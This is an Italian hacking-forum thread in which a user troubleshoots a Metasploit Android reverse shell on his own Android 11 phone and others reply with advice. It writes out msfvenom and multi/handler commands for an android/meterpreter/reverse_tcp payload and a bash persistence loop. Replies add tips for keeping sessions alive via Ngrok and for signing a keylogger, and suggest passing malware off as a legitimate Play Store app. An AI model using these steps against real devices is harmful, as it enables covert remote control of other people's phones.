Stai usando un browser non aggiornato. Potresti non visualizzare correttamente questo o altri siti web. Dovreste aggiornare o usare un browser alternativo.
Buongiorno, volevo chiedervi una info su metasploit: dopo aver acceduto al mio telefono android con metasploit, mi appare il prompt meterpreter, ma poco dopo pochi secondi mi si chiude la sesssione con il messaggio 'Meterpreter session 1 closed . Reason :died'? Ho provato a capire e cercare in giro, ma non ho trovato nulla. Qualcuno ha avuto lo stesso problema? Potete aiutarmi.Grazie
Probabilmente la reverse shell viene killata da Android.
Che versione di Android usi?
Hai degli antivirus o robe simili (sia sulla macchina con Metasploit, sia sul cell)?
Ciao Oxbro, grazie per la risposta: sul mio cell ho Android 11 senza antivirus.Sulla mia macchina virtuale dove gira metasploit ho Kali Linux senza antivirus.
Ciao Oxbro, grazie per la risposta: sul mio cell ho Android 11 senza antivirus.Sulla mia macchina virtuale dove gira metasploit ho Kali Linux senza antivirus.
Molto probabilmente ci sarà qualche meccanismo di sicurezza su Android 11 che fa chiudere la reverse shell o qualche incompatibilità con l'applicazione contenente meterpreter. Hai un cellulare vecchio (possibilmente Android 6 o precedente) com cui fare altri test? In questo modo potresti capire se il problema è relativo all'OS o ad altro.
In alternativa prova a scaricare Genymotion (emulatore per android) con diverse versioni di Android, magari 6 9 e 11, in modo da capire se è un comportamento consistente tra tutte le versioni o se a un certo punto è cambiato qualcosa
Il thread è troppo banale, non è possibile fornire una risposta esaustiva se non leaki la configurazione che hai usato per ottenere la reverse shell
1) Assicurati che il listener sia compatibile col payload
2) Assicurati d'aver fatto port forwarding, usa Ngrok in alternativa (col piano pro possibilmente, col piano free è instabile)
3) Assicurati che lo schermo di Android non entri in sleep durante la fase di staging, o la sessione verrà killata dopo poco. Meterpreter ha anche un comando apposito che impedisce allo schermo di Android di oscurarsi, ma puoi aggiungerlo anche direttamente al payload con msfvenom.
Grazie a tutti e due per la risposta. Faccio delle verifiche.
Messaggio unito automaticamente:
Ne approfitto per chiedervi anche un'altra info su un'altro problema: non riesco a mantenere l'aggancio al telefono ogni volta che provo a collegarmi da metasploit.
Le istruzioni che uso da prompt meterpreter sono:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IPRIVATO
set LPORT PORTA
però rimane in attesa senza agganciarsi. Le prove le stò facendo in Lan.
Per connettermi devo sempre premere la mia applicazione sul telefono.
Ho provato per la persistenza della backdoor , a creare il file con le seguenti istruzioni:
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done
ma quando provo da metasploit a lanciare il file script con estensione sh mi dà errore : Denial Permission.
Non sono riuscito a trovare un motivo per cui mi dà il messaggio di cui sopra: probabilmente sul telefono non ho i permessi per poterlo fare?Ho visto vari video, ma pare che quando provano a lanciare il file .sh funziona sempre.Dove sbaglio?
Grazie
Messaggio unito automaticamente:
L'istruzione msfvenom che uso è:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 R > /var/www/html/test.apk
Quello è il metodo vecchio e non funziona su Android 11, quello nuovo non me lo ricordo, l'ho perso... Non mi occupo di Android quindi ho smarrito le informazioni. Comunque tutti gli script che trovi su Google sono fallati e non funzionano più su Android 11/12
Messaggio unito automaticamente:
Senza contare che dovrei stare a smucinare 11 GB di archivi di ricerche per starlo a ritrovare
Czonta tha detto che quel metodo non worka su Android 11, quindi è inutile insistere, o cambi versione di android o trovi un altro metodo, o programmi tu una reverse per android.
Metasploit e compagnia bella non risolve sempre tutto.
Questo script non può funzionare perchè cerca di avviare l'applicazione utilizzando -user 0, cioè l'utente root, di cui non disponi i privilegi. Per fare in modo che funzioni dovresti cambiare l'identificativo 0 con quello del tuo utente, che di solito puoi ricavare con il comando id o da /etc/passwd
Tutto il resto del procedimento che hai mostrato è un procedimento standard che in uno ambiente di laboratorio dovrebbe funzionare. Visto però che stai usando un dispositivo reale, per lo più moderno, con tutte le ultime implementazioni di sicurezza di Google, serve fare ricerca per capire come mai non stia funzionando. Nessuno qui ha la bacchetta magica, nè abbiamo la scritta "Dizionario universale dell'hacking" scritto in fronte. Hacking vuol dire ricerca, sperimentazione, ed è ciò che si fa quando si hanno degli errori.
Detto questo, ribadisco i test che potresti fare per cercare di capire (tu) e aiutare (noi) a comprendere quale possa essere il motivo per cui non stia funzionando:
Molto probabilmente ci sarà qualche meccanismo di sicurezza su Android 11 che fa chiudere la reverse shell o qualche incompatibilità con l'applicazione contenente meterpreter. Hai un cellulare vecchio (possibilmente Android 6 o precedente) com cui fare altri test? In questo modo potresti capire se il problema è relativo all'OS o ad altro.
In alternativa prova a scaricare Genymotion (emulatore per android) con diverse versioni di Android, magari 6 9 e 11, in modo da capire se è un comportamento consistente tra tutte le versioni o se a un certo punto è cambiato qualcosa
Ti spieghiamo in parole povere, non è che non vogliamo aiutarti. E' che Android recentemente si è trasformato in un dispositivo quasi inespugnabile, è secondo solamente ad iOS iPhone in fatto di sicurezza. Puoi tranquillamente scrivere (o scaricare, modificare e ricompilare) tutti i malware che vuoi per questo dispositivo: per quanto siano perfetti hanno un tasso di attecchimento bassissimo, solamente a causa della security policy, che è estremamente restrittiva. La feature di sicurezza più solida in Android, sono i permessi dell'user, che da soli bastano per complicare assai ogni operazione che cerchi di fare con la shell. Se il telefono non è rootato puoi fare ben poco, alcune agenzie di sicurezza come NSA possono sviluppare degli exploit che corrompono la security policy di questi dispositivi, tuttavia non sono di dominio pubblico, perché categorizzati come armi informatiche vere e proprie. L'estrema diffusione di Android, ha comportato una presa di posizione molto severa da parte dei suoi produttori per garantire la sicurezza. Se provi ad attaccare un dispositivo Android datato, hai buone possibilità di riuscita, ma con Android 11/12 puoi fare davvero ben poco. Io d'altro canto non ho neppure tempo di studiare le falle in Android, perché non è un lavoro semplice. Provando, ad esempio, ad installare un keylogger su Android 10+, noterai fin da subito come l'OS si accorge che l'app non proviene da Play Store, cercando di impedirne l'installazione chiedendo varie conferme all'user. Puoi aggirare quest'ostacolo firmando il keylogger, ma Android continuerà comunque a chiedere altri permessi d'installazione, sollevando dubbi in merito alla sicurezza dell'app. Questo accade perché, se ci fai caso, le app per girare in Android necessitano obbligatoriamente di essere installate prima di essere eseguite, a differenza di Windows, che invece può eseguire standalone .exe saltando ogni procedura di verifica o installazione, è posto solamente un AV alla sicurezza, ed è l'unica risorsa effettiva che impedisce ai malware su Windows di girare. Per creare un malware effettivo al 100% per Android devi letteralmente riuscire a pubblicarlo prima su Play Store spacciandolo (o nascondendolo) in un'app legittima. Buona fortuna a riuscirci senza essere scoperto, vuoi un mio consiglio? Creati app con codici malevoli per conto tuo, e poi tienitele solo come "trofeo" di studio, come ho fatto io.